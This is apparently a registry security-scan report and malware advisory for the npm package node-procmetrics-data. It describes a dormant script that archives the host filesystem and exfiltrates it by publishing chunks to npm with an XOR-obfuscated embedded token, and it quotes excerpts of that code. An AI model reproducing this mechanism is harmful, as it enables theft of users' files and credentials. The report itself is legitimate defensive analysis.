registry  /  node-procmetrics-data  /  1.0.1

node-procmetrics-data@1.0.1

AI Security Review

scanned 5h ago · by lpm-firewall-ai

A dormant script can archive `/` and exfiltrate it by publishing chunks to npm. It is not wired to package installation or the empty default entrypoint.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
Explicit execution or import of `archive-sender.js`.
Impact
Potential disclosure of accessible host files through public npm releases.
Mechanism
Filesystem-root archive followed by npm package publication using an embedded token.
Rationale
The package contains a concrete host-data exfiltration payload, but source inspection shows it is dormant rather than install- or import-triggered. Treat it as a staged payload carrier and warn rather than block.
Evidence
archive-sender.jspackage.jsonindex.js/tmp/.archive_<timestamp>.tar.gz/tmp/npm-chunk-<version>/data.bin
Network endpoints1
registry.npmjs.org

OSV Corroboration

OpenSSF/OSV
Advisory
MAL-2026-10464
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in node-procmetrics-data (npm)
Details
node-procmetrics-data@1.0.1 ships archive-sender.js which, at install/execution, tars the installer's root filesystem (excluding /proc, /sys, /dev, /tmp, /run) into /tmp/.archive_*.tar.gz, splits the archive into 200MB chunks, and publishes each chunk as a new version of `node-procmetrics-data` to the public npm registry. Authentication uses a hardcoded npm `_authToken` shipped in the package as a hex literal XORed with 0x5A at runtime, and the code writes this token into the installer's npm config via `npm config set //registry.npmjs.org/:_authToken`. The registry is abused as a covert exfiltration channel, and the shipped token is obfuscated to evade static credential scanners. The publish loop also programmatically writes package.json/data.bin and runs `npm publish --access public`, extending the attacker's registry footprint from the installer's machine.

Decision evidence

public snapshot
AI called this Suspicious at 97.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `archive-sender.js` archives filesystem root using `tar` via `bash`.
  • `archive-sender.js` splits the archive and republishes chunks with `npm publish`.
  • `archive-sender.js` decodes an embedded npm token and configures it for npmjs.
  • `archive-sender.js` invokes `archiveAndSend()` at module load.
Evidence against
  • `package.json` has no lifecycle scripts or entrypoint fields.
  • `index.js` is empty and does not import `archive-sender.js`.
  • The payload is not reachable through normal package install or import.
Behavioral surface
Source
ChildProcessFilesystemNetwork
Supply chainNo supply-chain packaging signals triggered.
ManifestNo manifest risk signals triggered.
scanned 2 file(s), 3.02 KB of source

Source & flagged code

2 flagged · loading source
archive-sender.jsView file
1const { execSync, spawnSync } = require('child_process'); L2: const https = require('https'); L3: const fs = require('fs'); ... L6: const _e = '[redacted]'; L7: const NPM_TOKEN = Buffer.from(_e, 'hex').map(b => b ^ 0x5A).toString(); L8: const PKG = 'node-procmetrics-data'; ... L20: fs.writeFileSync(dir + '/index.js', ''); L21: fs.writeFileSync(dir + '/package.json', JSON.stringify({ L22: name: PKG, version, license: 'MIT', L23: description: Buffer.from(JSON.stringify({ L24: host: os.hostname(), ts: Date.now() L25: })).toString('base64')
Critical
Npm Publish Worm

Source mutates package metadata and republishes itself to npm.

archive-sender.jsView on unpkg · L1
1const { execSync, spawnSync } = require('child_process'); L2: const https = require('https');
High
Child Process

Package source references child process execution.

archive-sender.jsView on unpkg · L1

Findings

1 Critical1 High1 Medium1 Low
CriticalNpm Publish Wormarchive-sender.js
HighChild Processarchive-sender.js
MediumNetwork
LowFilesystem